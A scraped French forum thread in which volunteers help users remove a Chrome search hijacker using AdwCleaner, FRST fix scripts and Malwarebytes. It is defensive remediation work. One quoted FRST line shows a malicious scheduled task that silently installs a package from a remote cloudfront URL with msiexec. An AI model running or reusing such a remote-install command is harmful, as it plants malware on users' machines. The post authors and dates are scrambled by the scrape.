Supprimer nova.rambler.ru de Chrome [Résolu] - Virus / Sécurité

Supprimer nova.rambler.ru de Chrome » Meilleures réponses Comment me débarrasser de Nova.rambler.ru 2 ✓ résolu » Forum - Virus / Sécurité Virus nova.rambler.ru ✓ résolu » Forum - Virus / Sécurité Supprimer nova rambler ✓ résolu » Forum - Virus / Sécurité Nova rambler.ru ✓ résolu » Forum - Virus / Sécurité Besoin d'aide pour supprimer go.mail.ru de chrome svp ✓ résolu » Forum - Virus / Sécurité

Bonjour à tous, j'ai un gros problème avec chrome quand je fais une recherche ça me redirige vers un site qui s'appelle nova.rambler.ru sauf que quand je vais dans les paramètres pour le supprimer il n'apparaît pas. Si vous avez des solutions je suis preneur.

Ps: j'ai déjà essayé de changé de navigateur et de réinstaller chrome

Forum

Supprimer nova.rambler.ru de Chrome » Meilleures réponses Comment me débarrasser de Nova.rambler.ru 2 ✓ résolu » Forum - Virus / Sécurité Virus nova.rambler.ru ✓ résolu » Forum - Virus / Sécurité Supprimer nova rambler ✓ résolu » Forum - Virus / Sécurité Nova rambler.ru ✓ résolu » Forum - Virus / Sécurité Besoin d'aide pour supprimer go.mail.ru de chrome svp ✓ résolu » Forum - Virus / Sécurité

Web: www.shapebootstrap.net

19 réponses

Marsh

NOVEMBER 9, 2013 AT 9:15 PM

Salut,

Windows a été infecté par des adwares et programmes parasites. Ces indésirables sont connus pour provoquer des affichages de publicités et occasionner de sérieux ralentissements sur tes navigateurs WEB.
Créer un support de récupération pour Windows 10, 8.1 ou 7
Voici les étapes de la procédure à suivre :

1°)
Suis le tutoriel AdwCleaner d'Xplode
  • Télécharge le sur ton Bureau ou dans ton dossier des téléchargements,
  • Lance "AdwCleaner" puis clique sur [Scanner],
  • L'analyse va durer plusieurs minutes, patiente,
  • Une fois le scan terminé, ne décoche rien, clique sur [Nettoyer],
  • Une fois le nettoyage terminé, un rapport va s'ouvrir,
  • Copie/colle le contenu du rapport dans ta prochaine réponse.


Si le copié/collé ne fonctionne pas, utilise le site http://pjjoint.malekal.com/ pour héberger ton rapport, donne le lien du rapport dans un nouveau message.

Note : Le rapport est également sauvegardé sous C:\AdwCleaner[S1].txt

2°)
Réinitialise/Répare les navigateurs WEB :

3°) FRST
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
  • FRST.txt
  • Shortcut.txt
  • Additionnal.txt


Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.


Merci Malekal_morte- 6

Avec quelques mots c'est encore mieux Ajouter un commentaire

CCM a aidé 27697 internautes ce mois-ci

Reply
réponses:
  • Shoku666

    Merci beaucoup ! ;)

Marsh

NOVEMBER 9, 2013 AT 9:15 PM

Désinstalle :
Apowersoft Gestionnaire de Smartphone
Intel® Security Assist
Java



Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :


CreateRestorePoint:
CloseProcesses:
Task: {302CFD18-1862-4239-8D62-61384902432E} - System32\Tasks\Norton Security\Norton Autofix => C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\SymErr.exe
HKLM\...\Providers\1sl6jw2e: C:\Program Files (x86)\Chquchzasele Configuration\local64spl.dll [312320 2017-04-25] ()
ShellExecuteHooks: Pas de nom - {61D77BDE-2363-11E7-83F8-64006A5CFC23} - C:\Users\titouan.balandier\AppData\Roaming\Clelisp\Duceward.dll [145408 2017-04-25] ()
S2 srcsrv; C:\WINDOWS\src_srv\winsrcsrv.exe [X]
Task: {567717D7-97C6-410C-A579-E6BB7D989D44} - System32\Tasks\Dynamic Portable => Rundll32.exe "C:\Program Files\Dynamic Portable\Dynamic Portable.dll",NbAIDKeWV
2017-04-25 17:02 - 2017-04-25 17:02 - 00719521 _____ C:\WINDOWS\unins001.exe
2017-04-25 17:02 - 2017-04-25 17:02 - 00016832 _____ C:\WINDOWS\System32\Tasks\Dynamic Portable
2017-04-25 17:02 - 2017-04-25 17:02 - 00003660 _____ C:\WINDOWS\unins001.dat
2017-04-25 17:02 - 2017-04-25 17:02 - 00000000 ____D C:\Program Files\Dynamic Portable
2017-04-25 16:58 - 2017-04-25 16:59 - 00000000 ____D C:\Users\titouan.balandier\AppData\Local\Demoingshhutain
2017-04-25 16:58 - 2017-04-25 16:58 - 00006198 _____ C:\WINDOWS\System32\Tasks\Chquchzasele Configuration
2017-04-25 16:58 - 2017-04-25 16:58 - 00000000 ____D C:\Users\titouan.balandier\AppData\Roaming\Clelisp
2017-04-25 16:58 - 2017-04-25 16:58 - 00000000 ____D C:\Program Files (x86)\Ghiveiedikent
2017-04-25 16:58 - 2017-04-25 16:58 - 00000000 ____D C:\Program Files (x86)\Chquchzasele Configuration
EmptyTemp:
RemoveProxy:
Reboot:


Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",

A gauche, place toi sur le Bureau,

Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.


Redémarre l'ordinateur.

2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :

3°)
fais un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite

4°)
Vois s'il y a des améliorations
Refais un scan FRST et donne à nouveau les rapports via pjjoint.

Reply

Marsh

NOVEMBER 9, 2013 AT 9:15 PM

Bonjour,

As tu essayé d'aller dans Paramétres, dans les rubriques Parametres, Apparence et rechercher. Ensuite de regarder quels moteurs de recherches est existants et éventuellement supprimer ceux qui ne conviennent pas.

Reply

Marsh

NOVEMBER 9, 2013 AT 9:15 PM

Bonjour,
Malgré que le sujet soit assez ancien je voulais savoir si il serait toujours possible de me donner une réponse par rapport au 3 fichier que j'ai obtenu :
Frst: http://pjjoint.malekal.com/files.php?id=FRST_20170425_w10g13u8j8w6
Addition: http://pjjoint.malekal.com/files.php?id=20170425_h8i146d12l13
Shortcut: http://pjjoint.malekal.com/files.php?id=20170425_q10e9f9i5j10

Je vous remercie d'avance si une personne est capable de me donner un fix à ce problème.

Reply

Marsh

NOVEMBER 9, 2013 AT 9:15 PM

Voilà ce qu'il y a dans le fichier texte que j'ai obtenu :
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 23-04-2017 01
Exécuté par titouan.balandier (26-04-2017 09:39:12) Run:1
Exécuté depuis C:\Users\titouan.balandier\Desktop
Profils chargés: titouan.balandier (Profils disponibles: titouan.balandier)
Mode d'amorçage: Normal
==============================================

fixlist contenu:


CreateRestorePoint:
CloseProcesses:
Task: {302CFD18-1862-4239-8D62-61384902432E} - System32\Tasks\Norton Security\Norton Autofix => C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\SymErr.exe
HKLM\...\Providers\1sl6jw2e: C:\Program Files (x86)\Chquchzasele Configuration\local64spl.dll [312320 2017-04-25] ()
ShellExecuteHooks: Pas de nom - {61D77BDE-2363-11E7-83F8-64006A5CFC23} - C:\Users\titouan.balandier\AppData\Roaming\Clelisp\Duceward.dll [145408 2017-04-25] ()
S2 srcsrv; C:\WINDOWS\src_srv\winsrcsrv.exe [X]
Task: {567717D7-97C6-410C-A579-E6BB7D989D44} - System32\Tasks\Dynamic Portable => Rundll32.exe "C:\Program Files\Dynamic Portable\Dynamic Portable.dll",NbAIDKeWV
2017-04-25 17:02 - 2017-04-25 17:02 - 00719521 _____ C:\WINDOWS\unins001.exe
2017-04-25 17:02 - 2017-04-25 17:02 - 00016832 _____ C:\WINDOWS\System32\Tasks\Dynamic Portable
2017-04-25 17:02 - 2017-04-25 17:02 - 00003660 _____ C:\WINDOWS\unins001.dat
2017-04-25 17:02 - 2017-04-25 17:02 - 00000000 ____D C:\Program Files\Dynamic Portable
2017-04-25 16:58 - 2017-04-25 16:59 - 00000000 ____D C:\Users\titouan.balandier\AppData\Local\Demoingshhutain
2017-04-25 16:58 - 2017-04-25 16:58 - 00006198 _____ C:\WINDOWS\System32\Tasks\Chquchzasele Configuration
2017-04-25 16:58 - 2017-04-25 16:58 - 00000000 ____D C:\Users\titouan.balandier\AppData\Roaming\Clelisp
2017-04-25 16:58 - 2017-04-25 16:58 - 00000000 ____D C:\Program Files (x86)\Ghiveiedikent
2017-04-25 16:58 - 2017-04-25 16:58 - 00000000 ____D C:\Program Files (x86)\Chquchzasele Configuration
EmptyTemp:
RemoveProxy:
Reboot:


Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{302CFD18-1862-4239-8D62-61384902432E} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{302CFD18-1862-4239-8D62-61384902432E} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Norton Security\Norton Autofix => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Norton Security\Norton Autofix => clé supprimé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\1sl6jw2e => clé supprimé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\\order 1sl6jw2e => supprimé(es) avec succès
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{61D77BDE-2363-11E7-83F8-64006A5CFC23} => valeur supprimé(es) avec succès
HKCR\CLSID\{61D77BDE-2363-11E7-83F8-64006A5CFC23} => clé non trouvé(e).
HKLM\System\CurrentControlSet\Services\srcsrv => clé supprimé(es) avec succès
srcsrv => service supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{567717D7-97C6-410C-A579-E6BB7D989D44} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{567717D7-97C6-410C-A579-E6BB7D989D44} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Dynamic Portable => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Dynamic Portable => clé supprimé(es) avec succès
C:\WINDOWS\unins001.exe => déplacé(es) avec succès
"C:\WINDOWS\System32\Tasks\Dynamic Portable" => non trouvé(e).
C:\WINDOWS\unins001.dat => déplacé(es) avec succès
C:\Program Files\Dynamic Portable => déplacé(es) avec succès
C:\Users\titouan.balandier\AppData\Local\Demoingshhutain => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\Chquchzasele Configuration => déplacé(es) avec succès
C:\Users\titouan.balandier\AppData\Roaming\Clelisp => déplacé(es) avec succès
C:\Program Files (x86)\Ghiveiedikent => déplacé(es) avec succès
C:\Program Files (x86)\Chquchzasele Configuration => déplacé(es) avec succès

========= RemoveProxy: =========

HKLM\SYSTEM\CurrentControlSet\services\NlaSvc\Parameters\Internet\ManualProxies\\ => valeur supprimé(es) avec succès
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyEnable => valeur supprimé(es) avec succès
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyEnable => valeur supprimé(es) avec succès
HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => valeur supprimé(es) avec succès
HKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyEnable => valeur supprimé(es) avec succès
HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => valeur supprimé(es) avec succès
HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1826810316-1476713970-984432989-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyEnable => valeur supprimé(es) avec succès
HKU\S-1-5-21-1826810316-1476713970-984432989-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => valeur supprimé(es) avec succès
HKU\S-1-5-21-1826810316-1476713970-984432989-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1826810316-1476713970-984432989-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès


========= Fin de RemoveProxy: =========


=========== EmptyTemp: ==========

BITS transfer queue => 6053888 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 8800079 B
Java, Flash, Steam htmlcache => 451936510 B
Windows/system/drivers => 180777231 B
Edge => 781582 B
Chrome => 7648075 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 0 B
LocalService => 3314 B
NetworkService => 11018 B
titouan.balandier => 71413445 B

RecycleBin => 8523232006 B
EmptyTemp: => 8.6 GB données temporaires supprimées.

================================


Le système a dû redémarrer.

Fin de Fixlog 09:42:04

Reply

Marsh

NOVEMBER 9, 2013 AT 9:15 PM

y a du mieux ?

Reply

Marsh

NOVEMBER 9, 2013 AT 9:15 PM

Petite amélioration niveau vitesse mais une fois la recherche est lancée je retourne sur nova.Rumble.ru.

Reply

Marsh

NOVEMBER 9, 2013 AT 9:15 PM

Refais un nettoyage Malwarebytes

puis :

Réinstalle proprement Google Chrome, en suivant exactement cette procédure : https://www.malekal.com//reparer-google-chrome/#Reinstaller_Google_Chrome

Reply

Marsh

NOVEMBER 9, 2013 AT 9:15 PM

Google remarche tout à fait normalement je te remercie énormément pour ton aide il m'a beaucoup aidé je te souhaite une bonne continuation. ;-)

Reply

Marsh

NOVEMBER 9, 2013 AT 9:15 PM

Supprime le dossier C:\FRST


Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite


Quelques conseils :

Pour ne plus te faire avoir.
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)


Reply

Marsh

NOVEMBER 9, 2013 AT 9:15 PM

Merci pour le conseil je fais ça de suite

Reply

Marsh

NOVEMBER 9, 2013 AT 9:15 PM

voici ce que j'Ai eu quand j'ai fait le nettoyage :

http://pjjoint.malekal.com/files.php?id=20170516_s11z9d10y9z7

Reply
réponses:

Marsh

NOVEMBER 9, 2013 AT 9:15 PM

Bonjour à tous! J'ai le même problème de Rambler avec Chrome. J'ai suivi toutes les étapes jusqu'à 3°) FRST. Je vous mets ici les liens pour les différents fichiers .txt. Je sais que le sujet date mais ce serait vraiment cool d'avoir votre aide parce que ce Rambler là me pourrit là vie! Cordialement.

Addition: http://pjjoint.malekal.com/files.php?read=20170531_z12o613o7n12

FRST: http://pjjoint.malekal.com/files.php?id=FRST_20170531_y14t5l10l12l7

Shortcut: http://pjjoint.malekal.com/files.php?id=20170531_b8k9d15y5c5

Reply
réponses:
  • Malekal_morte-

    Salut,

    Essaye ça :

    Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

    Ouvre le bloc-notes : Touche Windows + R,
    Dans le champs "Exécuter", saisir notepad et OK.
    Copie/Colle dedans ce qui suit :

    CreateRestorePoint:
    CloseProcesses:
    Task: {47EBBBC2-2B28-4004-A482-7238E810A9D3} - System32\Tasks\Microsoft\Windows\DeviceSettings\Qivither => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=ST9500325AS_6VETSLGAXXXX6VETSLGA&d=20170527 /q <==== ATTENTION
    2017-05-27 15:50 - 2017-05-31 09:40 - 00000000 ____D C:\Program Files\Shijuly
    2017-05-27 15:50 - 2017-05-27 15:50 - 00001048 _____ C:\Users\USER\Desktop\Play Warframe.lnk
    2017-05-27 15:50 - 2017-05-27 15:50 - 00000000 ____D C:\Users\USER\AppData\Local\Anigichghocet
    2014-12-03 22:34 - 2014-12-12 20:15 - 0000757 _____ () C:\Users\USER\AppData\Roaming\bibstats
    2015-01-25 16:12 - 2015-01-25 16:12 - 0002086 _____ () C:\Users\USER\AppData\Roaming\LQ
    2015-03-31 08:14 - 2015-03-31 08:14 - 0001171 _____ () C:\Users\USER\AppData\Roaming\QFXZzFTM
    2016-06-26 17:32 - 2016-06-26 17:32 - 0000000 _____ () C:\Users\USER\AppData\Local\{AB0240B1-BB71-4DBF-870A-00200B1FC659}
    2015-12-09 23:30 - 2015-12-09 23:30 - 0000000 _____ () C:\Users\USER\AppData\Local\{D1F2155A-3548-4BA9-86B5-6203406CB728}
    2016-07-28 17:32 - 2016-07-28 17:32 - 0000000 _____ () C:\Users\USER\AppData\Local\{E8B1C71D-D2EA-4ACA-B16C-73A43C9BA6AE}
    Hosts:
    EmptyTemp:
    RemoveProxy:
    Reboot:


    Une fois, le texte collé dans le Bloc-notes,
    Menu "Fichier" puis "Enregistrer sous",
    A gauche, place toi sur le Bureau,
    Dans le champs en bas, nom du fichier mets : fixlist.txt
    Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

    Relance FRST et clique sur le bouton "Corriger / Fix"
    Un redémarrage sera peut-être nécessaire ( pas obligatoire )
    Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

    Redémarre l'ordinateur.


    2°)
    Réinitialise/Répare les navigateurs WEB concernés par les problèmes :

Marsh

NOVEMBER 9, 2013 AT 9:15 PM

Merci beaucoup Malekal! Plus de rambler! Je t'écris depuis mon navigateur chrome clean.Bonne continuation à toi!

Reply
réponses:
  • Malekal_morte-

    de rien :)

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed